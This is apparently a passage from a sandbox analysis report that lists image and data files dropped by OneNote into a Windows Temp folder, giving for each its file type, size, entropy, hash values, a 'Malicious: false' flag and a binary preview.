Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Temp\{0B8C8AB2-92B1-42D0-B9B7-79171166525C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{0EEC44DE-D4E6-48E2-8547-9BA7974BCF3D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Temp\{119D42AB-3391-47AC-82EC-1A4959E45A8A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6417817616504351
Encrypted:	false
SSDEEP:	6:RaYIYyfB3h1RRXUnf+rqLhnsR2R2R2jKowsigxwfRujlw//0lweI/sfxwtRujd:RaNYyf9/UfDnnQQKDgCYWf/SCw
MD5:	1AD6A2AA8ECDE0BABB1E3D83A52AB332
SHA1:	6DFA79F23E471AEC615B0E8D5521CC21A053D6D4
SHA-256:	560B5C9547AFDC4988B885ADEB50F5497FBD537B23D033EB695234822A763CB4
SHA-512:	6D3F886801C8C50DDB1B6B1B5A871D11BF25F78B72A8AE5A29D0C254390254A28E052A10D227DA9D153842D8B3D0886DDB824428929DA23CD1496A90EF116339
Malicious:	false
Preview:	./.C..vL....W"v_W....tH..x..8.................?.....I...............................................................................................................h..............................................:..qK.Fn.`x...........{./...L..fD#................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{1231200C-4045-4731-A010-41FEFB9D128C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6473182003045762
Encrypted:	false
SSDEEP:	12:RawfbYyf9/UfP4FlthtPQQMBCgKaCM2Wf/nCMq:YwzYyfS3UltbQQMBlN22Nq
MD5:	F14043E470858AA2D30FBB7041B8C17F
SHA1:	27A71855397D1609FA73AF44C0D3C16D61A84727
SHA-256:	F3760CB1974342557B52A8CC901C4AD20EB0A6B001465C94B26918F138DA602C
SHA-512:	F5498EF759372ECD6504A74D32848B0DFECC05294B17F191B50C0827B54060538626E9A2A282F93BDE37B7B4FC5D3F7A0900F50A41C99EDBB968A3572E7856DB
Malicious:	false
Preview:	./.C..vL....W"v_do?x.W.B...\2.9.................?.....I...............................................................................................................h............................................._y..2G..pKzWT.........S ..9~D.<R..[]..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{16AFCE82-7ABF-41D6-BBD5-E9EC612D9314}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Temp\{1A069D32-F861-40B6-8D23-093D69D558EF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{1AE993B2-0845-42E6-BEA9-59CF8C6883EB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Temp\{1E1A2DC0-6EE7-4418-A34D-7C43F20CE573}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{1EAA9CEE-2468-41D8-BF7B-16ED4A5AACF8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 623, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	7.583832946136897
Encrypted:	false
SSDEEP:	24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
MD5:	07DB3F43DE7C1392C67802E74707DAA6
SHA1:	C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
SHA-256:	51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
SHA-512:	E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
Malicious:	false
Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Temp\{1F72D3DC-1A9D-4FC8-8D4E-714E02215138}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{1F7CBC49-A2A8-4F97-A216-D680F307DEE2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.645860028922309
Encrypted:	false
SSDEEP:	6:Ra5L/ljYyfB3h1RRXUnfDpctftkR2R2R2jKwvFErlBRujlw//0lweI/yljRujd:Ra5LVYyf9/UfDChtQQh+oWf/3
MD5:	C95F8CCD7000E9E97CAF1B221E760F51
SHA1:	E9850AB651F1EA164237DC3447093BE0044ADA81
SHA-256:	69723244C816760914E8B4EAC98D737383A4C4B0F2B3727495F0C514A2B071FC
SHA-512:	4C5A1E28E522A60C19721121FBC9C846FE2D1013BC8D19A2F8DACDDAB3E61C062EF161A2FE1835680D84871EBEF6CDC05F048C3ED485BE46DB04E2D3C9F4C41B
Malicious:	false
Preview:	./.C..vL....W"v_@.."...K....Z..x................?.....I...............................................................................................................h...........................................R..$.O...-.3..........., .S.)B.f.5.N.C.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{226DAC03-11E7-4769-B441-81DABDD50A34}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{28052B7B-01A3-48CD-8A69-E99CF188F948}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{2A737472-966D-4356-B8B6-E74113DFB63C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Temp\{2CEC9D1B-B4C5-4EEB-AE64-566358D58FAB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Temp\{33433C09-6FD4-4BE3-B54A-0EC8CFAF1F14}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{38A77598-66CE-4E7A-B8B8-5EA475332B53}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
